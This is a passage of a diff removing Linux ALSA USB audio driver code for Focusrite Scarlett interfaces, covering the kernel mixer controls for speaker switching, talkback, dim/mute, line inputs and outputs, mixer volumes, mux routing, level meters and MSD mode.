+-	      ? "Direct Monitor Playback Switch"
+-	      : "Direct Monitor Playback Enum";
+-
+-	return scarlett2_add_new_ctl(
+-		mixer, &scarlett2_direct_monitor_ctl[info->direct_monitor - 1],
+-		0, 1, s, &private->direct_monitor_ctl);
+-}
+-
+-/*** Speaker Switching Control ***/
+-
+-static int scarlett2_speaker_switch_enum_ctl_info(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[3] = {
+-		"Off", "Main", "Alt"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 3, values);
+-}
+-
+-static int scarlett2_speaker_switch_enum_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->monitor_other_updated) {
+-		err = scarlett2_update_monitor_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->speaker_switching_switch;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-/* when speaker switching gets enabled, switch the main/alt speakers
+- * to HW volume and disable those controls
+- */
+-static int scarlett2_speaker_switch_enable(struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int i, err;
+-
+-	for (i = 0; i < 4; i++) {
+-		int index = line_out_remap(private, i);
+-
+-		/* switch the main/alt speakers to HW volume */
+-		if (!private->vol_sw_hw_switch[index]) {
+-			err = scarlett2_sw_hw_change(private->mixer, i, 1);
+-			if (err < 0)
+-				return err;
+-		}
+-
+-		/* disable the line out SW/HW switch */
+-		scarlett2_sw_hw_ctl_ro(private, i);
+-		snd_ctl_notify(card,
+-			       SNDRV_CTL_EVENT_MASK_VALUE |
+-				 SNDRV_CTL_EVENT_MASK_INFO,
+-			       &private->sw_hw_ctls[i]->id);
+-	}
+-
+-	/* when the next monitor-other notify comes in, update the mux
+-	 * configuration
+-	 */
+-	private->speaker_switching_switched = 1;
+-
+-	return 0;
+-}
+-
+-/* when speaker switching gets disabled, reenable the hw/sw controls
+- * and invalidate the routing
+- */
+-static void scarlett2_speaker_switch_disable(struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int i;
+-
+-	/* enable the line out SW/HW switch */
+-	for (i = 0; i < 4; i++) {
+-		scarlett2_sw_hw_ctl_rw(private, i);
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_INFO,
+-			       &private->sw_hw_ctls[i]->id);
+-	}
+-
+-	/* when the next monitor-other notify comes in, update the mux
+-	 * configuration
+-	 */
+-	private->speaker_switching_switched = 1;
+-}
+-
+-static int scarlett2_speaker_switch_enum_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->speaker_switching_switch;
+-	val = min(ucontrol->value.enumerated.item[0], 2U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->speaker_switching_switch = val;
+-
+-	/* enable/disable speaker switching */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
+-		0, !!val);
+-	if (err < 0)
+-		goto unlock;
+-
+-	/* if speaker switching is enabled, select main or alt */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
+-		0, val == 2);
+-	if (err < 0)
+-		goto unlock;
+-
+-	/* update controls if speaker switching gets enabled or disabled */
+-	if (!oval && val)
+-		err = scarlett2_speaker_switch_enable(mixer);
+-	else if (oval && !val)
+-		scarlett2_speaker_switch_disable(mixer);
+-
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_speaker_switch_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_speaker_switch_enum_ctl_info,
+-	.get  = scarlett2_speaker_switch_enum_ctl_get,
+-	.put  = scarlett2_speaker_switch_enum_ctl_put,
+-};
+-
+-static int scarlett2_add_speaker_switch_ctl(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	if (!info->has_speaker_switching)
+-		return 0;
+-
+-	return scarlett2_add_new_ctl(
+-		mixer, &scarlett2_speaker_switch_enum_ctl,
+-		0, 1, "Speaker Switching Playback Enum",
+-		&private->speaker_switching_ctl);
+-}
+-
+-/*** Talkback and Talkback Map Controls ***/
+-
+-static int scarlett2_talkback_enum_ctl_info(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *const values[3] = {
+-		"Disabled", "Off", "On"
+-	};
+-
+-	return snd_ctl_enum_info(uinfo, 1, 3, values);
+-}
+-
+-static int scarlett2_talkback_enum_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->monitor_other_updated) {
+-		err = scarlett2_update_monitor_other(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->talkback_switch;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_talkback_enum_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->talkback_switch;
+-	val = min(ucontrol->value.enumerated.item[0], 2U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->talkback_switch = val;
+-
+-	/* enable/disable talkback */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
+-		1, !!val);
+-	if (err < 0)
+-		goto unlock;
+-
+-	/* if talkback is enabled, select main or alt */
+-	err = scarlett2_usb_set_config(
+-		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
+-		1, val == 2);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_talkback_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_talkback_enum_ctl_info,
+-	.get  = scarlett2_talkback_enum_ctl_get,
+-	.put  = scarlett2_talkback_enum_ctl_put,
+-};
+-
+-static int scarlett2_talkback_map_ctl_get(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = elem->control;
+-
+-	ucontrol->value.integer.value[0] = private->talkback_map[index];
+-
+-	return 0;
+-}
+-
+-static int scarlett2_talkback_map_ctl_put(
+-	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] =
+-		private->info->port_count;
+-	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-
+-	int index = elem->control;
+-	int oval, val, err = 0, i;
+-	u16 bitmap = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->talkback_map[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->talkback_map[index] = val;
+-
+-	for (i = 0; i < num_mixes; i++)
+-		bitmap |= private->talkback_map[i] << i;
+-
+-	/* Send updated bitmap to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_TALKBACK_MAP,
+-				       0, bitmap);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_talkback_map_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_talkback_map_ctl_get,
+-	.put  = scarlett2_talkback_map_ctl_put,
+-};
+-
+-static int scarlett2_add_talkback_ctls(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-	int err, i;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-
+-	if (!info->has_talkback)
+-		return 0;
+-
+-	err = scarlett2_add_new_ctl(
+-		mixer, &scarlett2_talkback_enum_ctl,
+-		0, 1, "Talkback Playback Enum",
+-		&private->talkback_ctl);
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0; i < num_mixes; i++) {
+-		snprintf(s, sizeof(s),
+-			 "Talkback Mix %c Playback Switch", i + 'A');
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_talkback_map_ctl,
+-					    i, 1, s, NULL);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-/*** Dim/Mute Controls ***/
+-
+-static int scarlett2_dim_mute_ctl_get(struct snd_kcontrol *kctl,
+-				      struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->dim_mute[elem->control];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_dim_mute_ctl_put(struct snd_kcontrol *kctl,
+-				      struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-
+-	int index = elem->control;
+-	int oval, val, err = 0, i;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->dim_mute[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->dim_mute[index] = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_DIM_MUTE,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-	if (index == SCARLETT2_BUTTON_MUTE)
+-		for (i = 0; i < num_line_out; i++) {
+-			int line_index = line_out_remap(private, i);
+-
+-			if (private->vol_sw_hw_switch[line_index]) {
+-				private->mute_switch[line_index] = val;
+-				snd_ctl_notify(mixer->chip->card,
+-					       SNDRV_CTL_EVENT_MASK_VALUE,
+-					       &private->mute_ctls[i]->id);
+-			}
+-		}
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_dim_mute_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_dim_mute_ctl_get,
+-	.put  = scarlett2_dim_mute_ctl_put
+-};
+-
+-/*** Create the analogue output controls ***/
+-
+-static int scarlett2_add_line_out_ctls(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int err, i;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-
+-	/* Add R/O HW volume control */
+-	if (info->line_out_hw_vol) {
+-		snprintf(s, sizeof(s), "Master HW Playback Volume");
+-		err = scarlett2_add_new_ctl(mixer,
+-					    &scarlett2_master_volume_ctl,
+-					    0, 1, s, &private->master_vol_ctl);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add volume controls */
+-	for (i = 0; i < num_line_out; i++) {
+-		int index = line_out_remap(private, i);
+-
+-		/* Fader */
+-		if (info->line_out_descrs[i])
+-			snprintf(s, sizeof(s),
+-				 "Line %02d (%s) Playback Volume",
+-				 i + 1, info->line_out_descrs[i]);
+-		else
+-			snprintf(s, sizeof(s),
+-				 "Line %02d Playback Volume",
+-				 i + 1);
+-		err = scarlett2_add_new_ctl(mixer,
+-					    &scarlett2_line_out_volume_ctl,
+-					    i, 1, s, &private->vol_ctls[i]);
+-		if (err < 0)
+-			return err;
+-
+-		/* Mute Switch */
+-		snprintf(s, sizeof(s),
+-			 "Line %02d Mute Playback Switch",
+-			 i + 1);
+-		err = scarlett2_add_new_ctl(mixer,
+-					    &scarlett2_mute_ctl,
+-					    i, 1, s,
+-					    &private->mute_ctls[i]);
+-		if (err < 0)
+-			return err;
+-
+-		/* Make the fader and mute controls read-only if the
+-		 * SW/HW switch is set to HW
+-		 */
+-		if (private->vol_sw_hw_switch[index])
+-			scarlett2_vol_ctl_set_writable(mixer, i, 0);
+-
+-		/* SW/HW Switch */
+-		if (info->line_out_hw_vol) {
+-			snprintf(s, sizeof(s),
+-				 "Line Out %02d Volume Control Playback Enum",
+-				 i + 1);
+-			err = scarlett2_add_new_ctl(mixer,
+-						    &scarlett2_sw_hw_enum_ctl,
+-						    i, 1, s,
+-						    &private->sw_hw_ctls[i]);
+-			if (err < 0)
+-				return err;
+-
+-			/* Make the switch read-only if the line is
+-			 * involved in speaker switching
+-			 */
+-			if (private->speaker_switching_switch && i < 4)
+-				scarlett2_sw_hw_ctl_ro(private, i);
+-		}
+-	}
+-
+-	/* Add dim/mute controls */
+-	if (info->line_out_hw_vol)
+-		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++) {
+-			err = scarlett2_add_new_ctl(
+-				mixer, &scarlett2_dim_mute_ctl,
+-				i, 1, scarlett2_dim_mute_names[i],
+-				&private->dim_mute_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-
+-	return 0;
+-}
+-
+-/*** Create the analogue input controls ***/
+-
+-static int scarlett2_add_line_in_ctls(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	int err, i;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-	const char *fmt = "Line In %d %s Capture %s";
+-	const char *fmt2 = "Line In %d-%d %s Capture %s";
+-
+-	/* Add input level (line/inst) controls */
+-	for (i = 0; i < info->level_input_count; i++) {
+-		snprintf(s, sizeof(s), fmt, i + 1 + info->level_input_first,
+-			 "Level", "Enum");
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_level_enum_ctl,
+-					    i, 1, s, &private->level_ctls[i]);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add input pad controls */
+-	for (i = 0; i < info->pad_input_count; i++) {
+-		snprintf(s, sizeof(s), fmt, i + 1, "Pad", "Switch");
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_pad_ctl,
+-					    i, 1, s, &private->pad_ctls[i]);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add input air controls */
+-	for (i = 0; i < info->air_input_count; i++) {
+-		snprintf(s, sizeof(s), fmt, i + 1, "Air", "Switch");
+-		err = scarlett2_add_new_ctl(mixer, &scarlett2_air_ctl,
+-					    i, 1, s, &private->air_ctls[i]);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	/* Add input phantom controls */
+-	if (info->inputs_per_phantom == 1) {
+-		for (i = 0; i < info->phantom_count; i++) {
+-			snprintf(s, sizeof(s), fmt, i + 1,
+-				 "Phantom Power", "Switch");
+-			err = scarlett2_add_new_ctl(
+-				mixer, &scarlett2_phantom_ctl,
+-				i, 1, s, &private->phantom_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-	} else if (info->inputs_per_phantom > 1) {
+-		for (i = 0; i < info->phantom_count; i++) {
+-			int from = i * info->inputs_per_phantom + 1;
+-			int to = (i + 1) * info->inputs_per_phantom;
+-
+-			snprintf(s, sizeof(s), fmt2, from, to,
+-				 "Phantom Power", "Switch");
+-			err = scarlett2_add_new_ctl(
+-				mixer, &scarlett2_phantom_ctl,
+-				i, 1, s, &private->phantom_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-	}
+-	if (info->phantom_count) {
+-		err = scarlett2_add_new_ctl(
+-			mixer, &scarlett2_phantom_persistence_ctl, 0, 1,
+-			"Phantom Power Persistence Capture Switch", NULL);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-/*** Mixer Volume Controls ***/
+-
+-static int scarlett2_mixer_ctl_info(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = elem->channels;
+-	uinfo->value.integer.min = 0;
+-	uinfo->value.integer.max = SCARLETT2_MIXER_MAX_VALUE;
+-	uinfo->value.integer.step = 1;
+-	return 0;
+-}
+-
+-static int scarlett2_mixer_ctl_get(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->mix[elem->control];
+-	return 0;
+-}
+-
+-static int scarlett2_mixer_ctl_put(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int oval, val, num_mixer_in, mix_num, err = 0;
+-	int index = elem->control;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->mix[index];
+-	val = clamp(ucontrol->value.integer.value[0],
+-		    0L, (long)SCARLETT2_MIXER_MAX_VALUE);
+-	num_mixer_in = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-	mix_num = index / num_mixer_in;
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->mix[index] = val;
+-	err = scarlett2_usb_set_mix(mixer, mix_num);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const DECLARE_TLV_DB_MINMAX(
+-	db_scale_scarlett2_mixer,
+-	SCARLETT2_MIXER_MIN_DB * 100,
+-	SCARLETT2_MIXER_MAX_DB * 100
+-);
+-
+-static const struct snd_kcontrol_new scarlett2_mixer_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
+-		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
+-	.name = "",
+-	.info = scarlett2_mixer_ctl_info,
+-	.get  = scarlett2_mixer_ctl_get,
+-	.put  = scarlett2_mixer_ctl_put,
+-	.private_value = SCARLETT2_MIXER_MAX_DB, /* max value */
+-	.tlv = { .p = db_scale_scarlett2_mixer }
+-};
+-
+-static int scarlett2_add_mixer_ctls(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int err, i, j;
+-	int index;
+-	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-
+-	int num_inputs =
+-		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-	int num_outputs =
+-		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-
+-	for (i = 0, index = 0; i < num_outputs; i++)
+-		for (j = 0; j < num_inputs; j++, index++) {
+-			snprintf(s, sizeof(s),
+-				 "Mix %c Input %02d Playback Volume",
+-				 'A' + i, j + 1);
+-			err = scarlett2_add_new_ctl(mixer, &scarlett2_mixer_ctl,
+-						    index, 1, s, NULL);
+-			if (err < 0)
+-				return err;
+-		}
+-
+-	return 0;
+-}
+-
+-/*** Mux Source Selection Controls ***/
+-
+-static int scarlett2_mux_src_enum_ctl_info(struct snd_kcontrol *kctl,
+-					   struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	unsigned int item = uinfo->value.enumerated.item;
+-	int items = private->num_mux_srcs;
+-	int port_type;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_ENUMERATED;
+-	uinfo->count = elem->channels;
+-	uinfo->value.enumerated.items = items;
+-
+-	if (item >= items)
+-		item = uinfo->value.enumerated.item = items - 1;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		if (item < port_count[port_type][SCARLETT2_PORT_IN]) {
+-			const struct scarlett2_port *port =
+-				&scarlett2_ports[port_type];
+-
+-			sprintf(uinfo->value.enumerated.name,
+-				port->src_descr, item + port->src_num_offset);
+-			return 0;
+-		}
+-		item -= port_count[port_type][SCARLETT2_PORT_IN];
+-	}
+-
+-	return -EINVAL;
+-}
+-
+-static int scarlett2_mux_src_enum_ctl_get(struct snd_kcontrol *kctl,
+-					  struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->mux_updated) {
+-		err = scarlett2_usb_get_mux(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->mux[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
+-					  struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->mux[index];
+-	val = min(ucontrol->value.enumerated.item[0],
+-		  private->num_mux_srcs - 1U);
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->mux[index] = val;
+-	err = scarlett2_usb_set_mux(mixer);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_mux_src_enum_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = scarlett2_mux_src_enum_ctl_info,
+-	.get  = scarlett2_mux_src_enum_ctl_get,
+-	.put  = scarlett2_mux_src_enum_ctl_put,
+-};
+-
+-static int scarlett2_add_mux_enums(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int port_type, channel, i;
+-
+-	for (i = 0, port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		for (channel = 0;
+-		     channel < port_count[port_type][SCARLETT2_PORT_OUT];
+-		     channel++, i++) {
+-			int err;
+-			char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-			const char *const descr =
+-				scarlett2_ports[port_type].dst_descr;
+-
+-			snprintf(s, sizeof(s) - 5, descr, channel + 1);
+-			strcat(s, " Enum");
+-
+-			err = scarlett2_add_new_ctl(mixer,
+-						    &scarlett2_mux_src_enum_ctl,
+-						    i, 1, s,
+-						    &private->mux_ctls[i]);
+-			if (err < 0)
+-				return err;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-/*** Meter Controls ***/
+-
+-static int scarlett2_meter_ctl_info(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = elem->channels;
+-	uinfo->value.integer.min = 0;
+-	uinfo->value.integer.max = 4095;
+-	uinfo->value.integer.step = 1;
+-	return 0;
+-}
+-
+-static int scarlett2_meter_ctl_get(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	u16 meter_levels[SCARLETT2_MAX_METERS];
+-	int i, err;
+-
+-	err = scarlett2_usb_get_meter_levels(elem->head.mixer, elem->channels,
+-					     meter_levels);
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0; i < elem->channels; i++)
+-		ucontrol->value.integer.value[i] = meter_levels[i];
+-
+-	return 0;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_meter_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_PCM,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READ | SNDRV_CTL_ELEM_ACCESS_VOLATILE,
+-	.name = "",
+-	.info = scarlett2_meter_ctl_info,
+-	.get  = scarlett2_meter_ctl_get
+-};
+-
+-static int scarlett2_add_meter_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	/* devices without a mixer also don't support reporting levels */
+-	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_meter_ctl,
+-				     0, private->num_mux_dsts,
+-				     "Level Meter", NULL);
+-}
+-
+-/*** MSD Controls ***/
+-
+-static int scarlett2_msd_ctl_get(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->msd_switch;
+-	return 0;
+-}
+-
+-static int scarlett2_msd_ctl_put(struct snd_kcontrol *kctl,
+-				 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->msd_switch;
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->msd_switch = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MSD_SWITCH,
+-				       0, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_msd_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_msd_ctl_get,
+-	.put  = scarlett2_msd_ctl_put,
+-};
+-
+-static int scarlett2_add_msd_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	if (!info->has_msd_mode)
+-		return 0;
+-
